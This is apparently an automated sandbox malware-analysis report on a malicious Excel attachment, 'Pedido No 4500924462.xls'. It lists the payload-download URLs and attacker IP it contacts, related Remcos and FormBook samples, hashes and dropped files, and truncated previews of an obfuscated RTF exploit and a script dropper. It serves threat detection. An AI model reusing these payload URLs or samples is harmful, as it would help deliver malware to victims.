          NameMaliciousAntivirus DetectionReputation
          http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFtrue
          • Avira URL Cloud: safe
          		unknown
          https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slicefalse
          • Avira URL Cloud: safe
          		unknown
          http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doctrue
          • Avira URL Cloud: safe
          		unknown
          https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7cfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://crl.entrust.net/server1.crl0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://ocsp.entrust.net03powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://3105.filpowershell.exe, 0000000D.00000002.471392095.0000000002999000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://go.microspowershell.exe, 0000000D.00000002.471392095.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orangePedido No 4500924462.xls, 8A830000.0.dr, ~DF5A3DDFB1D8F2532B.TMP.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFjEQNEDT32.EXE, 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF?EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ljg.cl/ljg.cl.url.3.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.entrust.net0Dpowershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.473369989.0000000002638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.471392095.00000000025E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://secure.comodo.com/CPS0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://3105.filemail.compowershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              193.30.119.205
                                              		ip.3105.filemail.comunknown
                                              		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                              152.231.102.107
                                              		ljg.clChile
                                              		6471ENTELCHILESACLfalse
                                              23.95.128.215
                                              		unknownUnited States
                                              		36352AS-COLOCROSSINGUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1563998
                                              Start date and time:2024-11-27 17:54:45 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:1
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Pedido No 4500924462.xls
                                              Detection:MAL
                                              Classification:mal100.expl.evad.winXLS@9/28@10/3
                                              EGA Information:
                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 26
                                              • Number of non-executed functions: 13
                                              Cookbook Comments:
                                              • Found application associated with file extension: .xls
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer

                                              Warnings

                                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                              • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 4024 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: Pedido No 4500924462.xls

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:56:21API Interceptor96x Sleep call for process: EQNEDT32.EXE modified
                                              11:56:25API Interceptor13x Sleep call for process: wscript.exe modified
                                              11:56:26API Interceptor70x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              193.30.119.20526-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  Inquiry.jsGet hashmaliciousUnknownBrowse
                                                    Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                      creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                          thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                  152.231.102.107List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      23.95.128.21526-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 23.95.128.215/226/wc/greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ip.3105.filemail.com26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.30.119.205
                                                                      New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      ljg.clList#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      AS-COLOCROSSINGUS26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 23.95.128.215
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 107.175.113.196
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 107.175.113.196
                                                                      8gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                      • 192.3.220.30
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 192.227.170.51
                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 104.170.223.54
                                                                      nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 107.173.108.43
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 107.172.44.175
                                                                      sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 104.168.46.26
                                                                      thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 198.46.178.192
                                                                      DFNVereinzurFoerderungeinesDeutschenForschungsnetzese26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                      • 141.36.226.152
                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 141.46.25.133
                                                                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 134.100.186.144
                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 134.28.58.216
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 141.65.115.68
                                                                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 141.51.102.5
                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 141.48.190.154
                                                                      ENTELCHILESACLList#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.100.2.34
                                                                      akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.120.114.146
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 11.113.3.48
                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 186.10.181.57
                                                                      nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.112.79.218
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.99.146.111
                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.126.50.37
                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.99.66.51

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607d26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      Document.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      gr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      FHG538JGH835DG86S.docGet hashmaliciousDarkTortilla, XWormBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      • 152.231.102.107
                                                                      7dcce5b76c8b17472d024758970a406b26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025553961890493235
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPc/Ak8RvxggLR5iVg1CFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPqbcdie1CbvYg3J/
                                                                      MD5:4F228FAB144AB07980CB7687D2850220
                                                                      SHA1:18A685A3D7DD1029075164F93F1C02780FB3076E
                                                                      SHA-256:73D1F239795965E1AE01CB0B30CF0ED47C18EEF3D07D46339A412BE8F71000B1
                                                                      SHA-512:FDA7B0636B012387650A963D60D10982F30D9A83159D25F67CC76F877D4D51F86D9DEC58BBABE64A1443317DA6487CE40EABC715B39DA8C002D742F7A3563542
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:......M.eFy...z.J....>C....).S,...X.F...Fa.q............................3.(...I..0)..qF........+..;.G.C...K6.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4760
                                                                      Entropy (8bit):4.834060479684549
                                                                      Encrypted:false
                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):249980
                                                                      Entropy (8bit):2.3598396912578936
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YwENs3iItNrGpMmDD2EnD7744ARcEjlCcAizk1PhrGkZErF:lEa3JNSH2FR3vnYFFGcqF
                                                                      MD5:29D663B176F3D88812FD891D1D3EFA0F
                                                                      SHA1:600BD3E6CB7600CFC5A6752F2F537CA02E28564A
                                                                      SHA-256:81D875A8215C97BF39E091D2F6D553B6E0094DCB619DE16F2D86634AFDFAF2F9
                                                                      SHA-512:346AAF88242EE7F56D4D0869D1C2B980642C53D3B3309FDCF101763E2CDA740F652C4EEEF1670CD9EE6DB699EFF0C5494C3B7FAEAA992FD512EBFAB930CA443D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1...{\*\pnaiud603980834 \.}.{\4979101970(.*2%>^55-/_?7.!+%>4;2.%3;/1?@|9;.7?;^1[<[=0^%+*?(_?&|31#*5_7?`.@?)!7$`80?%=0.74(.?')%0.?-/'?9,#3*-%)+:7%|0.]0-?[?,=)?->:8/)_<5`(@-^:#9$??520*]+/?8~7(.%57@-7`0&6^!;<`#8;?*1/$3.#(^7;_:/@=???2,)%&>.:^%.-..!%*/2=6!*4/);>>)%+^:?^4]._2>8@(78$%?(:80?+8?:2~]:%4<@59`*./=]1%:,955?&72?&?/]#47<%@?1=~_.?%:+:&49~#5!+@_??/!?<,$`8?.)?[`(?|5/??4>=+8,%^[`-.`*?&^7|>*-`^9'?791?^`?'.|2.~6+:,)4??(<51-7.^.23|+0:7^&;`0(#&?^@'=1^?@?!%<>554*:~@+1;4$%:;,;_?.0*%-+|[=%-..?&&$?>=_]0.>.9,?,..(=@3??$;`9?[>?7,8&=5)]`=.8_$~059|3.%&+.#3:&;01??%#9..<2#<4?8?=:/%%$4%/`(,5:;`-????~]03=?%180>(~8|?8'#?.?~,@;?~??`)!,`3]_!#3'`..)%!~<?(3.@^>7?&(*18*%0![0%?(<*?:.734._8@]$<@6;?1%0-@.<..!2|.>.?~?'08<5%..-.241'&.$$&6!'+)74-@;4%%`/-!.;.%=0>=^$08?$(;4.;%=0|'./3*!2??:7'#4?.?%6`)6&|7?._?5$;;[.;[$_#.+(.49;?#<.+`>5+$?.%.1%*??4@3<'(@248.??!$5??9@?'5-??@^<8(.'],[`@8?72*?1;;&`/:?*;)._44~~>-)[~9|6^7>[?%1783^+<)_?$?/,=^[[%?|&4#|-#^.1?5%3&%?(?^;:?-1#?1.$+6]%#0?.,6?`.($82*.?]#3!.[&89,4`::@9:]_1!.%'_%

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seemegivenmebesttokissyourlipswithentirethingsf9rmegive[1].tiff

                                                                      Download File
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):164934
                                                                      Entropy (8bit):3.909751863320666
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tfSbgch/i6M5Cde7vL5vyaGuBfSbgch/i6M5Cde7vL5gfSbgch/i6M5Cde7vL51:tfSbjhZdQL5tfSbjhZdQL5gfSbjhZdQf
                                                                      MD5:B9765F41CF6B094C309E61D92530447F
                                                                      SHA1:A708DD6C737B06BF842D7933AAC106BB97AA60D3
                                                                      SHA-256:1168E97D0CCBC4A68C3BFA7C420D9BBDB2D985B225109E9FF6D4558AA0BE2BB5
                                                                      SHA-512:8AA37821D21CA75EB4F721A3285417C798597DDAD958A5AB620A3EF2A3968433BB6CF91F2E237CEEADB0C55AC9EDA87CA60D7F203074768F82CDDF25F4226192
                                                                      Malicious:false
                                                                      Preview:..........W.L.L.P.Q.B.K.Z.R.f.U.W.L.R.k. .=. .".O.J.e.z.u.W.z.x.L.i.z.b.h.N.a.".....W.r.L.W.G.e.K.c.q.f.l.u.K.t.x. .=. .".W.W.k.p.K.p.A.L.i.i.u.d.G.e.W.".....z.K.T.k.K.i.l.h.O.t.p.l.e.R.A. .=. .".U.G.G.t.K.s.N.i.G.x.u.L.B.W.I.".....i.h.e.n.l.c.e.K.L.L.L.h.j.A.v. .=. .".s.W.L.q.i.c.L.C.K.P.G.P.N.i.n.".....L.p.c.L.h.C.m.n.b.W.K.P.L.L.K. .=. .".I.K.n.p.K.f.L.m.N.u.f.L.r.f.B.".....B.U.p.z.W.W.N.z.p.d.W.L.U.P.L. .=. .".G.L.f.L.l.d.N.a.L.Z.G.l.U.L.d.".........i.K.U.O.C.j.K.o.K.L.b.e.p.K.L. .=. .".p.L.W.W.o.G.J.i.x.S.u.U.G.n.P.".....z.m.z.e.O.G.c.R.c.h.A.x.B.m.t. .=. .".f.Z.B.d.c.L.O.n.n.i.o.c.z.a.G.".....c.W.W.t.U.C.a.I.k.U.i.f.K.A.W. .=. .".f.p.k.L.h.W.Z.h.S.P.K.i.O.K.b.".........i.K.s.L.U.e.n.m.i.k.C.i.A.h.U. .=. .".B.Z.x.k.T.G.U.T.e.S.W.i.H.f.T.".....f.B.O.i.u.b.B.K.c.t.B.G.c.U.L. .=. .".P.T.f.A.i.N.l.Z.h.N.A.T.U.g.A.".....P.b.q.O.u.p.a.z.K.K.Z.A.K.Z.r. .=. .".h.u.L.l.k.l.W.G.S.L.W.A.Z.a.J.".....K.o.q.N.c.c.j.m.l.U.Z.S.k.K.B. .=. .".U.G.Z.W.u.K.b.o.o.O.c.W.Z.e.r.".....U.a.b.k.K.z.c.L.U.Z.

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C86E85E.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):43456
                                                                      Entropy (8bit):3.124030869325278
                                                                      Encrypted:false
                                                                      SSDEEP:384:Lajiu/9hWrI9KovPayXN76Reo8pPgjiD6s3iKJ:LaF/zr95P7lrF8iB1J
                                                                      MD5:195C2D5D988E9E0E930FC2E614569D6B
                                                                      SHA1:5380B18C1265183540A2BCF804B2241DD52F9EB2
                                                                      SHA-256:209E4FB0ACD84B7C0FC1931D910EE64634D3D7E119E598CDB0044F4D7525A38F
                                                                      SHA-512:6912C8E3350D322F204AECFED0770D64C5A6DE1172338E2D38BFD4D4257F38BB3C1AAF361EF2F024AE0AD38DD308ED2F3AB906A0505130D092C410912AAAF4DA
                                                                      Malicious:false
                                                                      Preview:....l...........;...............~@..xW.. EMF................................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........X.......`.......................X.......X.......`.......7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................`..+.@..........p.......h.......p.......................h.......h.......p.......7......................@.N..............C.a.l.i.b.r.i...........

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\821C5575.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):3350324
                                                                      Entropy (8bit):1.7377088769624822
                                                                      Encrypted:false
                                                                      SSDEEP:12288:46vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgCv:RODhqH8
                                                                      MD5:A32BE3562AF3F7E24B8C4297AC5DC5C8
